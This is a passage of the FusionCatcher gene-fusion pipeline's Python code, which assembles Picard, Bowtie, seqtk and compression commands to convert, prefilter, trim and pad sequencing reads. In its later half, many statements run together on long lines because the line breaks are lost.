        new_list_input_files.append(outfile4)
    elif input_file.endswith(".bam") or input_file.endswith(".sam"):
        i = i + 1
        outfile1 = outdir(os.path.basename(input_file)[:-4]+'_1.fq')
        outfile2 = outdir(os.path.basename(input_file)[:-4]+'_2.fq')
#        job.add('samtools',kind='program')
#        job.add('view',input_file,kind='input')
#        job.add('|',kind='parameter')
##        job.add('grep',kind='parameter')
##        job.add('-v','^@',kind='parameter')
##        job.add('|',kind='parameter')
#        job.add('LC_ALL=C',kind='parameter')
#        job.add('sort',kind='parameter')
#        job.add('-t',"'\t'",kind='parameter')
#        job.add('-k','1,1',kind='parameter')
#        if sort_buffer:
#            job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no')
#        if sort_parallel:
#            job.add('--parallel',options.processes,kind='parameter',checksum='no')
#        if sort_lzop_compress:
#            job.add('--compress-program','lzop',kind='parameter',checksum='no')
#        elif sort_gzip_compress:
#            job.add('--compress-program','gzip',kind='parameter',checksum='no')
#        job.add('-T',tmp_dir,kind='parameter',checksum='no')
#        job.add('|',kind='parameter')
#        job.add('awk',kind='parameter')
#        job.add("""-F"\\\\t" '{if ( $1==old1 ) { print "@"$1"\\n"$10"\\n+\\n"$11 > "%s"; print "@"old1"\\n"old10"\\n+\\n"old11 > "%s"; old1="" }; {old1=$1; old10=$10; old11=$11}; }'""" % (outfile1,outfile2),kind='parameter')
##        job.add("""-F"\\\\t" '{if ( $1==old ) { print old0"\\n"$0; old="" }; {old=$1; old0=$0}; }'""",kind='parameter')
##        job.add('|',kind='parameter')
##        job.add('awk',kind='parameter')
##        job.add("""'{if(NR%%2==0) {print "@"$1"\\n"$10"\\n+\\n"$11 > "%s.fq"} else {print "@"$1"\\n"$10"\\n+\\n"$11 > "%s.fq"}}'""" % (outfile1,outfile2),kind='parameter')
#        job.add('',outfile1,kind='output',command_line='no')
#        job.add('',outfile2,kind='output',command_line='no')
#        job.run()
#        #cat H716.sam | awk 'NR%2==0 {print "@"$1"\n"$10"\n+\n"$11}' > 1.fq
#        #cat H716.sam | awk 'NR%2==1 {print "@"$1"\n"$10"\n+\n"$11}' > 2.fq
#
# java -jar SamToFastq.jar INPUT=G28616.NCI-H2228.1.bam F=r1.fq F2=r2.fq NON_PF=True
#
        job.add(_JA_+'java',kind='program')
        job.add('-jar',os.path.join(_PD_,'picard.jar'),kind='parameter')
        job.add('SamToFastq',kind='parameter')
        job.add('NON_PF=','True',kind='parameter',space='no')
        job.add('INPUT=',input_file,kind='input',space='no')
        job.add('F=',outfile1,kind='output',space='no')
        job.add('F2=',outfile2,kind='output',space='no')
        job.run()
        new_list_input_files.append(outfile1)
        new_list_input_files.append(outfile2)
    else:
        new_list_input_files.append(input_file)
list_input_files = new_list_input_files[:]
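# Note: when --prefilter is "1" and the input is paired-end, the block below
# pairs the input files two by two and aligns each pair to the transcriptome
# with Bowtie, keeping only the reads that do NOT map (--un); reads that map
# cleanly to known transcripts are presumably uninformative for fusion
# junctions and are dropped early to shrink the data. For single-end input
# the mode is switched to "3" instead (see the first branch below).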
if options.prefilter == "1":
    if options.single_end:
        options.prefilter = "3"
    else:
        new_list_input_files = []
        pairs = [(list_input_files[i-1],list_input_files[i]) for i in xrange(1,len(list_input_files),2)]
        i = -1
        for (f,r) in pairs:
            i = i + 1
            # ft2 = outdir("box-%d.fq" % (i,))
            f2 = outdir("box-%d_1.fq" % (i,))
            r2 = outdir("box-%d_2.fq" % (i,))
            ft3 = outdir("blox-%d.fq" % (i,))
            f3 = outdir("blox-%d_1.fq" % (i,))
            r3 = outdir("blox-%d_2.fq" % (i,))
            fastlen = outdir("fast-len-%d.txt" % (i,))
            if f.lower().endswith('.fastq.gz') or f.lower().endswith('.fq.gz') or f.lower().endswith('.fastq') or f.lower().endswith('.fq'):
                use_seed = True
                if use_seed:
                    # get the reads length!
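                    # Note: the job below estimates the longest read cheaply:
                    # decompress only the first ~4000 bytes of the (possibly
                    # gzipped) FASTQ, keep the first 4 records (16 lines),
                    # fold each record onto one line with `paste - - - -`,
                    # take the sequence column, and print the maximum length.
                    # Roughly the shell pipeline being assembled (illustrative):
                    #
                    #   head -c 4000 reads.fq.gz | gzip -dcf 2>/dev/null | head -16 \
                    #     | paste - - - - | cut -f 2 \
                    #     | awk '{ if (length($0) > longest) longest = length($0) } END { print longest }'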
                    job.add('head',kind='program')
                    job.add('-c','4000',kind='parameter')
                    job.add('',f,kind='input')
                    job.add('|',kind='parameter')
                    job.add('gzip',kind='parameter')
                    job.add('--force',kind='parameter')
                    job.add('--decompress',kind='parameter')
                    job.add('--stdout',kind='parameter')
                    job.add('2>/dev/null',kind='parameter')
                    job.add('|',kind='parameter')
                    job.add('head',kind='parameter')
                    job.add('-16',kind='parameter')
                    job.add('|',kind='parameter')
                    job.add('paste',kind='parameter')
                    job.add('- - - -',kind='parameter')
                    job.add('|',kind='parameter')
                    job.add('cut',kind='parameter')
                    job.add('-f','2',kind='parameter')
                    job.add('|',kind='parameter')
                    job.add('LC_ALL=C',kind='parameter')
                    job.add('awk',kind='parameter')
                    job.add("""'{ if (length($0) > longest) longest = length($0); } END { print longest }'""",kind='parameter')
                    job.add('>',fastlen,kind='output')
                    job.run()

                    fast_len_reads = 0
                    if job.run():
                        if os.path.exists(outdir(fastlen)):
                            fast_len_reads = int(float(file(fastlen,'r').readline().rstrip()))

                    if options.reads and options.reads > 1:
                        # map reads on the transcriptome for fast filtering
                        job.add(_SK_+'seqtk',kind='program')
                        job.add('mergepe',kind='parameter')
                        job.add('',f,kind='input')
                        job.add('',r,kind='input')
                        job.add('|',kind='parameter')
                        job.add('LC_ALL=C',kind='parameter')
                        job.add('head',kind='parameter')
                        job.add('-n',4*options.reads,kind='parameter')
                        job.add('|',kind='parameter')
                        job.add(_BE_+'bowtie',kind='parameter')
                        job.add('--seed',bowtie_seed,kind='parameter')
                        job.add('-t',kind='parameter')
                        job.add('--seedmms','1',kind='parameter') # options.mismatches
                        job.add('-X','100000',kind='parameter') # The maximum insert size for valid paired-end alignments.
                        job.add('-p',options.processes,kind='parameter',checksum='no')
                        job.add('-k','1',kind='parameter')
                        job.add('--phred33-quals',kind='parameter')
                        job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no')
                        if fast_len_reads > 80:
                            job.add('--trim5','10',kind='parameter') # trim 10 bases from the 5' end
                            job.add('--seedlen','60',kind='parameter')
                        elif fast_len_reads > 74:
                            job.add('--trim5','7',kind='parameter') # trim 7 bases from the 5' end
                            job.add('--seedlen','60',kind='parameter')
                        elif fast_len_reads > 59:
                            job.add('--trim5','5',kind='parameter') # trim 5 bases from the 5' end
                            job.add('--seedlen','53',kind='parameter')
                        elif fast_len_reads > 49:
                            job.add('--trim5','5',kind='parameter') # trim 5 bases from the 5' end
                            job.add('--seedlen','40',kind='parameter')
                        else:
                            job.add('--trim5','2',kind='parameter') # trim 2 bases from the 5' end
                            job.add('--seedlen','40',kind='parameter')
                        job.add('--un',ft3,kind='output',checksum='no') # unmapped reads
                        job.add('--un',f3,kind='output',command_line='no') # unmapped reads
                        job.add('--un',r3,kind='output',command_line='no') # unmapped reads
                        job.add('--max',"/dev/null",kind='parameter') # if this is missing then these reads are going to '--un'
                        if os.path.isfile(datadir('transcripts_index','.1.ebwtl')):
                            job.add('--large-index',kind='parameter')
                        job.add('',datadir('transcripts_index/'),kind='input')
                        job.add('--interleaved','-',kind='input')
                        job.add('','/dev/null',kind='parameter')
                        job.add('2>',outdir('log_superfast-prefiltering-transcriptome.stdout.txt'),kind='output',checksum='no')
                        job.run()
                    else:
                        # map reads on the transcriptome for fast filtering
                        job.add(_BE_+'bowtie',kind='program')
                        job.add('--seed',bowtie_seed,kind='parameter')
                        job.add('-t',kind='parameter')
                        job.add('--seedmms','1',kind='parameter') # options.mismatches
                        job.add('-X','100000',kind='parameter') # The maximum insert size for valid paired-end alignments.
                        job.add('-p',options.processes,kind='parameter',checksum='no')
                        job.add('-k','1',kind='parameter')
                        job.add('--phred33-quals',kind='parameter')
                        # job.add('--tryhard',kind='parameter')
                        job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no')
                        # job.add('--best',kind='parameter')
                        #job.add('--strata',kind='parameter')
                        if fast_len_reads > 80:
                            job.add('--trim5','10',kind='parameter') # trim 10 bases from the 5' end
                            job.add('--seedlen','60',kind='parameter')
                        elif fast_len_reads > 74:
                            job.add('--trim5','7',kind='parameter') # trim 7 bases from the 5' end
                            job.add('--seedlen','60',kind='parameter')
                        elif fast_len_reads > 59:
                            job.add('--trim5','5',kind='parameter') # trim 5 bases from the 5' end
                            job.add('--seedlen','53',kind='parameter')
                        elif fast_len_reads > 49:
                            job.add('--trim5','5',kind='parameter') # trim 5 bases from the 5' end
                            job.add('--seedlen','40',kind='parameter')
                        else:
                            job.add('--trim5','2',kind='parameter') # trim 2 bases from the 5' end
                            job.add('--seedlen','40',kind='parameter')
                        job.add('--un',ft3,kind='output',checksum='no') # unmapped reads
                        job.add('--un',f3,kind='output',command_line='no') # unmapped reads
                        job.add('--un',r3,kind='output',command_line='no') # unmapped reads
                        job.add('--max',"/dev/null",kind='parameter') # if this is missing then these reads are going to '--un'
                        if os.path.isfile(datadir('transcripts_index','.1.ebwtl')):
                            job.add('--large-index',kind='parameter')
                        job.add('',datadir('transcripts_index/'),kind='input')
                        job.add('-1',f,kind='input')
                        job.add('-2',r,kind='input')
                        job.add('','/dev/null',kind='parameter')
                        job.add('2>',outdir('log_superfast-prefiltering-transcriptome.stdout.txt'),kind='output',checksum='no')
                        job.run()
#                        # map reads on the genome for fast filtering
#                        job.add(_BE_+'bowtie',kind='program')
#                        job.add('--seed',bowtie_seed,kind='parameter')
#                        job.add('-t',kind='parameter')
#                        job.add('--seedmms','1',kind='parameter') # options.mismatches
#                        job.add('--seedlen',options.trim_3end_keep,kind='parameter')
#                        job.add('-X','100000',kind='parameter') # The maximum insert size for valid paired-end alignments.
#                        job.add('-p',options.processes,kind='parameter',checksum='no')
#                        job.add('-k','1',kind='parameter')
#                        job.add('--phred33-quals',kind='parameter')
#                        # job.add('--tryhard',kind='parameter')
#                        job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no')
#                        # job.add('--best',kind='parameter')
#                        #job.add('--strata',kind='parameter')
#                        #job.add('--trim5','15',kind='parameter') # trim the 10
#                        job.add('--un',ft3,kind='output',checksum='no') # unmapped reads
#                        job.add('--un',f3,kind='output',command_line='no') # unmapped reads
#                        job.add('--un',r3,kind='output',command_line='no') # unmapped reads
#                        job.add('--max',"/dev/null",kind='parameter') # if this is missing then these reads are going to '--un'
#                        if os.path.isfile(datadir('genome_index2','.1.ebwtl')):
#                            job.add('--large-index',kind='parameter')
#                        job.add('',datadir('genome_index2/index'),kind='input')
#                        job.add('-1',f2,kind='input',temp_path=temp_flag)
#                        job.add('-2',r2,kind='input',temp_path=temp_flag)
#                        job.add('','/dev/null',kind='parameter')
#                        job.add('2>',outdir('log_superfast-prefiltering-genome.stdout.txt'),kind='output',checksum='no')
#                        job.run()
                else:
                    # this was the original one
                    # map reads on the transcriptome for fast filtering
                    job.add(_BE_+'bowtie',kind='program')
                    job.add('--seed',bowtie_seed,kind='parameter')
                    job.add('-t',kind='parameter')
                    job.add('-v','1',kind='parameter') # options.mismatches
                    # job.add('-X','800',kind='parameter')
                    job.add('-X','100000',kind='parameter') # The maximum insert size for valid paired-end alignments.
job.add('-p',options.processes,kind='parameter',checksum='no') job.add('-k','1',kind='parameter') job.add('--phred33-quals',kind='parameter') # job.add('--tryhard',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') # job.add('--best',kind='parameter') #job.add('--strata',kind='parameter') job.add('--un',tz,kind='output',checksum='no') # unmapped reads job.add('--un',t1z,kind='output',command_line='no') # unmapped reads job.add('--un',t2z,kind='output',command_line='no') # unmapped reads job.add('--max','/dev/null',kind='output',temp_path=temp_flag) # if this is missing then these reads are going to '--un' if os.path.isfile(datadir('transcripts_genes_index','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',datadir('transcripts_index/'),kind='input') job.add('-1',f,kind='input',temp_path=temp_flag) job.add('-2',r,kind='input',temp_path=temp_flag) job.add('','/dev/null',kind='output',temp_path=temp_flag) job.add('2>',outdir('log_fast-filtering.stdout.txt'),kind='output',checksum='no') job.run() info(job, fromfile = fastlen, tofile = info_file, top = ["Longest read (fast computation)", "--------------------------------"], bottom = "\n\n\n", temp_path=temp_flag) info(job, fromfile = outdir('log_superfast-prefiltering-transcriptome.stdout.txt'), tofile = info_file, top = ["Super fast pre-filtering -- transcriptome:", "------------------------------------------"], bottom = "\n\n\n", temp_path=temp_flag) # info(job, # fromfile = outdir('log_superfast-prefiltering-genome.stdout.txt'), # tofile = info_file, # top = ["Super fast pre-filtering -- genome:", # "------------------------------------------"], # bottom = "\n\n\n", # temp_path=temp_flag) else: job.link(f, f3, temp_path=temp_flag) job.link(r, r3, temp_path=temp_flag) new_list_input_files.append(f3) new_list_input_files.append(r3) list_input_files = new_list_input_files[:] shuffled = False new_list_input_files = [] for i,input_file in enumerate(list_input_files): output_file = None if input_file.lower().endswith('.gz') and (not input_file.lower().endswith('.tar.gz')): output_file = outdir('init-'+str(i)+'_'+os.path.basename(input_file)[:-3]) # decompress if pigz: job.add(_PZ_+'pigz',kind='program') job.add('-p',options.processes,kind='parameter',checksum='no') else: job.add('gzip',kind='program') job.add('-d',kind='parameter') job.add('-f',kind='parameter') job.add('-c',kind='parameter') job.add('',input_file,kind='input') job.add('>',output_file,kind='output') job.run() elif input_file.lower().endswith('.xz'): output_file = outdir('init-'+str(i)+'_'+os.path.basename(input_file)[:-3]) # decompress # decompress if pxz: job.add('pxz',kind='program') job.add('-T',options.processes,kind='parameter',checksum='no') else: job.add('xz',kind='program') job.add('-dc',kind='parameter') job.add('',input_file,kind='input') job.add('>',output_file,kind='output') job.run() elif input_file.lower().endswith('.zip'): output_file = outdir('init-'+str(i)+'_'+os.path.basename(input_file)[:-4]) # decompress job.add('unzip',kind='program') job.add('-p',kind='parameter') job.add('-o',kind='parameter') job.add('',input_file,kind='input') job.add('>',output_file,kind='output') job.run() elif input_file.lower().endswith('.bz2') and (not input_file.lower().endswith('.tar.bz2')): output_file = outdir('init-'+str(i)+'_'+os.path.basename(input_file)[:-4]) # decompress job.add('bzip2',kind='program') job.add('-d',kind='parameter') job.add('-f',kind='parameter') job.add('-c',kind='parameter') 
job.add('',input_file,kind='input') job.add('>',output_file,kind='output') job.run() elif ( input_file.lower().endswith('.fq') or input_file.lower().endswith('.fastq')): output_file = outdir('init-'+str(i)+'_'+os.path.basename(input_file)) # link job.link(input_file, output_file, temp_path=temp_flag) else: print >> sys.stderr,"ERROR: unknown extension of the input file! '%s'" % (input_file,) print >> sys.stderr,"Supported extension files are:" print >> sys.stderr," .fastq," print >> sys.stderr," .fq," print >> sys.stderr," .txt.zip," print >> sys.stderr," .fastq.zip," print >> sys.stderr," .fq.zip," print >> sys.stderr," .txt.gz," print >> sys.stderr," .fastq.gz," print >> sys.stderr," .fq.gz," print >> sys.stderr," .txt.bz2," print >> sys.stderr," .fastq.bz2," print >> sys.stderr," .fq.bz2," print >> sys.stderr," .fastq.xz," print >> sys.stderr," .fq.xz," print >> sys.stderr," .bam," print >> sys.stderr," .sam" sys.exit(1) new_list_input_files.append(output_file) list_input_files = new_list_input_files[:] if options.single_end and list_input_files: # single-end reads new_list_input_files = [] for i,input_file in enumerate(list_input_files): output_file_1 = outdir('single-1-'+str(i)+'_'+os.path.basename(input_file)) output_file_2 = outdir('single-2-'+str(i)+'_'+os.path.basename(input_file)) if options.skip_fastqtk: #compute the read lengths for the input file job.add(_FC_+'lengths_reads.py',kind='program') job.add('--input',input_file,kind='input') job.add('--output',outdir('single','log_lengths_single_reads_%s.txt' % (str(i),)),kind='output') job.run() else: job.add(_FK_+'fastqtk',kind='program') job.add('lengths',kind='parameter') job.add('',input_file,kind='input') job.add('',outdir('single','log_lengths_single_reads_%s.txt' % (str(i),)),kind='output') job.run() max_len_reads = 0 if os.path.exists(outdir('single','log_lengths_single_reads_%s.txt' % (str(i),))): max_len_reads = int(float(file(outdir('single','log_lengths_single_reads_%s.txt' % (str(i),)),'r').readline().rstrip())) if not options.bridges: options.bridges = int(math.ceil(float(max_len_reads)/float(160))) if max_len_reads < options.sonication: print >> sys.stderr,"ERROR: The input single-end reads are too short to be used by FusionCatcher!" 
sys.exit(1) use_fragment = False if use_fragment: job.add(_SK_+'seqtk',kind='program') job.add('trimfq',kind='parameter') job.add('-q','0.25',kind='parameter') job.add('',input_file,kind='input',temp_path=temp_flag) job.add('>',outdir('single-read--%d.fq' %(i,)),kind='output') job.run() job.add(_FC_+'fragment_fastq.py',kind='program') job.add('-1',outdir('single-read--%d.fq' %(i,)),kind='input',temp_path=temp_flag) job.add('-2','-',kind='parameter') job.add('-f',output_file_1,kind='output') job.add('-r',output_file_2,kind='output') job.add('--window-size',options.trim_psl_3end_keep,kind='parameter') job.add('--step-size',options.trim_psl_3end_keep-2*length_anchor_minimum+1,kind='parameter') job.add('--threshold-read',options.trim_psl_3end_keep + 10,kind='parameter') job.add('--anchors',options.bridges,kind='parameter') job.add('--skip-short',options.trim_3end_keep,kind='parameter') job.add('--trim-n',kind='parameter') job.run() fragments_flag = True else: job.add(_SK_+'seqtk',kind='program') job.add('trimfq',kind='parameter') job.add('-q','0.25',kind='parameter') job.add('',input_file,kind='input',temp_path=temp_flag) job.add('>',output_file_1,kind='output') job.run() job.add(_SK_+'seqtk',kind='program') job.add('seq',kind='parameter') job.add('-r',kind='parameter') job.add('',output_file_1,kind='input') job.add('>',output_file_2,kind='output') job.run() new_list_input_files.append(output_file_1) new_list_input_files.append(output_file_2) list_input_files = new_list_input_files[:] nif = len(list_input_files) if nif == 0: print >> sys.stderr,"ERROR: No input files found!" sys.exit(1) elif nif == 1 or options.skip_interleave_processing: pass else: #list_input_files = new_list_input_files[:] new_list_input_files = [] pairs = [(list_input_files[i-1],list_input_files[i]) for i in xrange(1,len(list_input_files),2)] i = -1 final_i = i for (f,r) in pairs: i = i + 1 # automatically remove adapters output_1_file = outdir(os.path.basename(f).replace('init-','init-noadapt-')) output_2_file = outdir(os.path.basename(r).replace('init-','init-noadapt-')) job.add('printf',kind='program') job.add('"\n\nFirst 8 lines of input FASTQ file: %s\n-------------------------\n"' % (r,),kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add('head',kind='program') job.add('-8',r,kind='input') job.add('>>',info_file,kind='output') job.run() job.add('printf',kind='program') job.add('"\n\nFirst 8 lines of input FASTQ file: %s\n-------------------------\n"' % (f,),kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add('head',kind='program') job.add('-8',f,kind='input') job.add('>>',info_file,kind='output') job.run() job.add('printf',kind='program') job.add('"\n\nLast 8 lines of input FASTQ file: %s\n-------------------------\n"' % (r,),kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add('tail',kind='program') job.add('-8',r,kind='input') job.add('>>',info_file,kind='output') job.run() job.add('printf',kind='program') job.add('"\n\nLast 8 lines of input FASTQ file: %s\n-------------------------\n"' % (f,),kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add('tail',kind='program') job.add('-8',f,kind='input') job.add('>>',info_file,kind='output') job.run() if options.single_end: job.link(f,output_1_file,temp_path=temp_flag) job.link(r,output_2_file,temp_path=temp_flag) if options.prefilter == "2": options.prefilter = "3" else: # pre-filter before the reads BEFORE are trimmed and evaluated if options.prefilter == "2": f2 = 
outdir(os.path.basename(f).replace('init-','init-super-')) r2 = outdir(os.path.basename(r).replace('init-','init-super-')) tz = outdir('sf%d.fq' % (i,)) t1z = outdir('sf%d_1.fq' % (i,)) t2z = outdir('sf%d_2.fq' % (i,)) fastlen = outdir("fast-lengths-%d.txt" % (i,)) use_seed = True if use_seed: job.add('head',kind='program') job.add('-c','4000',kind='parameter') job.add('',f,kind='input') job.add('|',kind='parameter') job.add('gzip',kind='parameter') job.add('--force',kind='parameter') job.add('--decompress',kind='parameter') job.add('--stdout',kind='parameter') job.add('2>/dev/null',kind='parameter') job.add('|',kind='parameter') job.add('head',kind='parameter') job.add('-16',kind='parameter') job.add('|',kind='parameter') job.add('paste',kind='parameter') job.add('- - - -',kind='parameter') job.add('|',kind='parameter') job.add('cut',kind='parameter') job.add('-f','2',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('awk',kind='parameter') job.add("""'{ if (length($0) > longest) longest = length($0); } END { print longest }'""",kind='parameter') job.add('>',fastlen,kind='output') job.run() fast_len_reads = 0 if job.run(): if os.path.exists(outdir(fastlen)): fast_len_reads = int(float(file(fastlen,'r').readline().rstrip())) # map reads on transcriptome for fast filtering job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') job.add('--seedmms','1',kind='parameter') # options.mismatches job.add('-X','100000',kind='parameter') # The maximum insert size for valid paired-end alignments. job.add('-p',options.processes,kind='parameter',checksum='no') job.add('-k','1',kind='parameter') job.add('--phred33-quals',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') if fast_len_reads > 80: job.add('--trim5','10',kind='parameter') # trim the 10 job.add('--seedlen','60',kind='parameter') elif fast_len_reads > 74: job.add('--trim5','7',kind='parameter') # trim the 10 job.add('--seedlen',60,kind='parameter') elif fast_len_reads > 59: job.add('--trim5','5',kind='parameter') # trim the 10 job.add('--seedlen','53',kind='parameter') elif fast_len_reads > 49: job.add('--trim5','5',kind='parameter') # trim the 10 job.add('--seedlen',40,kind='parameter') else: job.add('--trim5','2',kind='parameter') # trim the 10 job.add('--seedlen','40',kind='parameter') job.add('--un',tz,kind='output',checksum='no') # unmapped reads job.add('--un',t1z,kind='output',command_line='no') # unmapped reads job.add('--un',t2z,kind='output',command_line='no') # unmapped reads job.add('--max',"/dev/null",kind='parameter') # if this is missing then these reads are going to '--un' if os.path.isfile(datadir('transcripts_index','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',datadir('transcripts_index/'),kind='input') job.add('-1',f,kind='input',temp_path=temp_flag) job.add('-2',r,kind='input',temp_path=temp_flag) job.add('','/dev/null',kind='parameter') job.add('2>',outdir('log_fast-filtering.stdout.txt'),kind='output',checksum='no') job.run() else: # this was the original one # map reads on transcriptome for fast filtering job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') job.add('-v','1',kind='parameter') # options.mismatches # job.add('-X','800',kind='parameter') job.add('-X','10000',kind='parameter') # The maximum insert size for valid paired-end alignments. 
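# note: '-X 10000' here (and '-X 100000' in the seeded variant above) sets the
# maximum insert size far above any realistic fragment length, so insert-size
# constraints effectively never reject a pair at this stage; the pre-filter
# only needs to split reads into mapped (discarded) and unmapped (kept) sets.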
job.add('-p',options.processes,kind='parameter',checksum='no') job.add('-k','1',kind='parameter') job.add('--phred33-quals',kind='parameter') # job.add('--tryhard',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') # job.add('--best',kind='parameter') #job.add('--strata',kind='parameter') job.add('--un',tz,kind='output',checksum='no') # unmapped reads job.add('--un',t1z,kind='output',command_line='no') # unmapped reads job.add('--un',t2z,kind='output',command_line='no') # unmapped reads job.add('--max',outdir('sf%d_multiple.fq' % (i)),kind='output',temp_path=temp_flag) # if this is missing then these reads are going to '--un' if os.path.isfile(datadir('transcripts_index','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',datadir('transcripts_index/'),kind='input') job.add('-1',f,kind='input',temp_path=temp_flag) job.add('-2',r,kind='input',temp_path=temp_flag) job.add('',outdir('ox.map'),kind='output',temp_path=temp_flag) job.add('2>',outdir('log_fast-filtering.stdout.txt'),kind='output',checksum='no') job.run() info(job, fromfile = fastlen, tofile = info_file, top = ["Longest read (fast computation)", "--------------------------------"], bottom = "\n\n\n", temp_path=temp_flag) # save lengths reads info(job, fromfile = outdir('log_fast-filtering.stdout.txt'), tofile = info_file, top = ["Fast pre-filtering:", "------------------------"], bottom = "\n\n\n", temp_path=temp_flag) job.link(t1z, f2, temp_path=temp_flag) job.link(t2z, r2, temp_path=temp_flag) f = f2 r = r2 else: pass job.add(_FC_+'overlap.py',kind='program') job.add('--input_1',f,kind='input') job.add('--input_2',r,kind='input') job.add('--processes',options.processes,kind='parameter',checksum='no') job.add('--fail-gracefully',kind='parameter',checksum='no') job.add('--output',outdir('log_overlaps__%d.txt' % (i,)),kind='output') job.add('2>',outdir('log_overlaps_error__%d.txt' % (i,)),kind='parameter',checksum='no') job.run() sizes = False if os.path.exists(outdir('log_overlaps_error__%d.txt' % (i,))): # find out if it failed because of the different reads sizes sizes = True if [1 for line in file(outdir('log_overlaps_error__%d.txt' % (i,)),'r').readlines() if line.lower().find('different lengths') != -1] else False if job.iff(sizes, id = "#different_sizes_of_reads_overlap_%d#" % (i,)): # input FASTQ files contain reads of different sizes therefore they are paded so end up being the same size job.clean(outdir('log_overlaps_error__%d.txt' % (i,)),temp_path=temp_flag) job.clean(outdir('log_overlaps__%d.txt' % (i,)),temp_path=temp_flag) if options.skip_fastqtk: job.add(_FC_+'lengths_reads.py',kind='program') job.add('--input',f,kind='input') job.add('--output',outdir('log_lengths_original_reads_f_%d.txt' % (i,)),kind='output') job.run() job.add(_FC_+'lengths_reads.py',kind='program') job.add('--input',r,kind='input') job.add('--output',outdir('log_lengths_original_reads_r_%d.txt' % (i,)),kind='output') job.run() else: job.add(_FK_+'fastqtk',kind='program') job.add('lengths',kind='parameter') job.add('',f,kind='input') job.add('',outdir('log_lengths_original_reads_f_%d.txt' % (i,)),kind='output') job.run() job.add(_FK_+'fastqtk',kind='program') job.add('lengths',kind='parameter') job.add('',r,kind='input') job.add('',outdir('log_lengths_original_reads_r_%d.txt' % (i,)),kind='output') job.run() #job.add('cat',kind='program') #job.add('',outdir('log_lengths_original_reads_f_%d.txt' % (i,)),kind='input',temp_path=temp_flag) #job.add('',outdir('log_lengths_original_reads_r_%d.txt' % 
(i,)),kind='input',temp_path=temp_flag) #job.add('|',kind='parameter') #job.add('LC_ALL=C',kind='parameter') #job.add('sort',kind='parameter') #if sort_buffer: # job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') #if sort_parallel: # job.add('--parallel',options.processes,kind='parameter',checksum='no') #if sort_lzop_compress: # job.add('--compress-program','lzop',kind='parameter',checksum='no') #elif sort_gzip_compress: # job.add('--compress-program','gzip',kind='parameter',checksum='no') #job.add('-T',tmp_dir,kind='parameter',checksum='no') #job.add('-nr',kind='parameter') #job.add('|',kind='parameter') #job.add('uniq',kind='parameter') #job.add('>',outdir('log_lengths_original_reads_fr_%d.txt' % (i,)),kind='output') #job.run() x = outdir('log_lengths_original_reads_f_%d.txt' % (i,)) y = outdir('log_lengths_original_reads_r_%d.txt' % (i,)) if job.run(): n1 = 0 if os.path.isfile(x): n1 = int(float(file(x,'r').readline().strip())) n2 = 0 if os.path.isfile(y): n2 = int(float(file(y,'r').readline().strip())) file(outdir('log_lengths_original_reads_fr_%d.txt' % (i,)),'w').write(str(min(n1,n2))) job.clean(x,temp_path=temp_flag) job.clean(y,temp_path=temp_flag) ff = f[:] rr = r[:] f = outdir(os.path.basename(f).replace('init-','init-f-')) r = outdir(os.path.basename(r).replace('init-','init-r-')) # add A to the reads which are shorter in order to make all reads have the same length job.add(_FC_+'padding-fastq.py',kind='program') job.add('--input',ff,kind='input',temp_path=temp_flag) job.add('--output',f,kind='output') job.add('--size',outdir('log_lengths_original_reads_fr_%d.txt' % (i,)),kind='parameter',from_file='yes') job.run() job.add(_FC_+'padding-fastq.py',kind='program') job.add('--input',rr,kind='input',temp_path=temp_flag) job.add('--output',r,kind='output') job.add('--size',outdir('log_lengths_original_reads_fr_%d.txt' % (i,)),kind='parameter',from_file='yes') job.run() job.clean(outdir('log_lengths_original_reads_fr_%d.txt' % (i,)),temp_path=temp_flag) job.add(_FC_+'overlap.py',kind='program') job.add('--input_1',f,kind='input') job.add('--input_2',r,kind='input') job.add('--processes',options.processes,kind='parameter',checksum='no') job.add('--output',outdir('log_overlaps_fr_%d.txt' % (i,)),kind='output') job.run() info(job, fromfile = outdir('log_overlaps_fr_%d.txt' % (i,)), tofile = info_file, top = ["","","", "Pair-reads overlappings (after padding):", "----------------------------------------"], bottom = "\n\n\n", temp_path=temp_flag) else: info(job, fromfile = outdir('log_overlaps__%d.txt' % (i,)), tofile = info_file, top = ["","","", "Pair-reads overlappings:", "------------------------"], bottom = "\n\n\n", temp_path=temp_flag) job.clean(outdir('log_overlaps_error__%d.txt' % (i,)),temp_path=temp_flag) if (not options.skip_adapter_filtering): job.add(_FC_+'remove-adapter.py',kind='program') job.add('--processes',options.processes,kind='parameter',checksum='no') job.add('--input_1',f,kind='input',temp_path=temp_flag) job.add('--input_2',r,kind='input',temp_path=temp_flag) job.add('--output_1',output_1_file,kind='output') job.add('--output_2',output_2_file,kind='output') job.add('--trim-n',options.mismatches+1,kind='parameter') job.add('--link','hard',kind='parameter',checksum='no') job.add('>',outdir('log_adapters_%d.txt' % (i,)),kind='parameter',checksum='no') job.add('2>&1',kind='parameter',checksum='no') job.run() info(job, fromfile = outdir('log_adapters_%d.txt' % (i,)), tofile = info_file, top = ["", "Adapters information:", "--------------------"], 
